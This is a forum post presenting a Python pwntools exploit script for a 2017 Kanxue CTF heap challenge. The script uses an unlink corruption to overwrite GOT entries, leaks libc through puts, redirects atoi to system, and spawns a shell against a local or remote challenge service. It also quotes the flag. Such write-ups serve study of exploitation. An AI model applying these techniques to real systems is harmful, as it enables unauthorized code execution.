-
-
[原创]看雪CTF2017 第四题 PWN逆向分析
-
2017-6-9 10:22
4424
-
[原创]看雪CTF2017 第四题 PWN逆向分析
详细过程已更新,详见附件,贴上poc:
from pwn import *
import binascii
import time
#PediyCTF{n0_pwn_n0_fun_233}
g_local=True
context.log_level='debug'
sh=0
if g_local:
sh=process("./pediy")
#print_log("attch by ida.....")
raw_input("ida has attch? Press any key for continue...")
else:
sh=remote("211.159.216.90",51888)
def welcome():
print sh.recvuntil('$ ')
#paylaod=p64(0)+p64(0x21)+'A'*16
#sh.send(paylaod)
sh.sendline("pediy")
return sh.recvuntil('$ ')
print welcome()
def free(id):
sh.sendline('2')
print sh.recv(1024)
sh.sendline(str(id))
time.sleep(1)
return sh.recv(2048)
def create(size,id,context):
sh.sendline('1')
print sh.recv(1024)
sh.sendline(str(size))
print sh.recv(1024)
sh.sendline(str(id))
print sh.recv(1024)
sh.sendline(str(context))
return sh.recvuntil("$ ")
def edit(id,payload):
sh.sendline('3')
print sh.recv(1024)
sh.sendline(str(id))
print sh.recv(1024)
sh.send(payload)
return sh.recv(2048)
def test_Double_free():
create(16,0,"sssss")
create(16,1,"xxxxxxxxxxx")
free(0)
free(1)
free(0)
print("write new trunk address:")
xx=raw_input("new address:")
payload=p64(int(xx,16))+'A'*12
create(16,0,payload)
raw_input()
create(16,0,"1111111111111")
create(16,0,payload)
create(16,0,"1111111111111")
raw_input()
create(16,0,"1111111111111")
create(16,0,"1111111111111")
create(16,0,"1111111111111")
def test_2():
create(16,0,"sssss")
free(-2)
print("write new trunk address:")
payload=p32(0x6020e8)+"xxxxxxxxxx"
create(20,0,payload)
g_dest_list=0x6020e0
free_got_plt=0x602018
puts_got_plt=0x602020
puts_plt=0x4006d0
atoi_got_plt=0x602058
fd=g_dest_list-0x18
bk=g_dest_list-0x10
def test_unlink():
FIRST_TRUNK_SIZE=0x80
SECOND_TRUNK_SIZE=0x80
create(FIRST_TRUNK_SIZE,0,"1"*FIRST_TRUNK_SIZE)
create(SECOND_TRUNK_SIZE,1,'2'*SECOND_TRUNK_SIZE)
#free g_dwSizeAry
free(-2)
#raw_input("change size")
#malloc -->return g_dwSizeAry address,then change the size
#payload=p32(0x20)+p32(0x20)+p32(FIRST_TRUNK_SIZE*2)+p32(SECOND_TRUNK_SIZE)+p32(0)
size_payload=""
size_payload+=p32(FIRST_TRUNK_SIZE*2) # index=0 change size
size_payload+=p32(SECOND_TRUNK_SIZE) # index=1 keep
size_payload+=p32(0)
size_payload+=p32(0)
size_payload+=p32(0)
create(20,2,size_payload)
#raw_input("edit note0")
#edit index=0
payload1=""
payload1+=p64(0) #prev size= trunk used=0
payload1+=p64(0x81) #value=this trunk size + prev trunk flag =0x80 +1
payload1+=p64(fd) #free_got_plt
payload1+=p64(bk)
payload1+='A'*(FIRST_TRUNK_SIZE-8*4)
payload1+=p64(len(payload1)) #size=len(payload1) overflower to index=1
payload1+=p64(SECOND_TRUNK_SIZE+0x10) #value=this trunk size + prev trunk flag =0x80 +0x10+0
edit(0,payload1)
raw_input("unlink")
#unlink then g_dest_list[0]=&g_dest_list-0x18
free(1)
#edit index=0 address=0x6020c8
edit_paylaod=""
edit_paylaod+=p64(0)
edit_paylaod+=p64(0)
edit_paylaod+=p64(0)
edit_paylaod+=p64(free_got_plt) #g_dest_list[0] for change free_got_plt to puts_plt to leak
edit_paylaod+=p64(1) #g_dwFlag[0]
edit_paylaod+=p64(puts_got_plt) #g_dest_list[1] puts_got_plt For leak puts_got_plt address
edit_paylaod+=p64(1) #g_dwFlag[1]
edit_paylaod+=p64(atoi_got_plt) #g_dest_list[2] atoi_got_plt For chage atoi to system
edit_paylaod+=p64(1) #g_dwFlag[2]
#edit(0,p64(0)+p64(0)+p64(0)+p64(free_got_plt)+p64(1)+p64(0x602058)+p64(1)+p64(0x602058))
edit(0,edit_paylaod)
#raw_input("change free_got_plt to puts_plt ")
edit(0,p64(puts_plt))
#leak puts_got_plt
#raw_input("leak puts_got_plt addr ")
xx=free(1)
str_puts_addreess=xx[0:6]
print str_puts_addreess
str_puts_addreess=str_puts_addreess+"\x00\x00"
raw_input("calc system address")
if g_local:
system_address=u64(str_puts_addreess)-0x6f690+0x45390
else:
system_address=u64(str_puts_addreess)-0x6cee0+0x41fd0
print "system_address",hex(system_address)
#chage atoi
raw_input("chage puts_got_plt to system_address ")
edit(2,p64(system_address))
#run system("/bin/sh")
sh.sendline("/bin/sh")
#get shell
sh.interactive()
test_unlink()
raw_input()
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
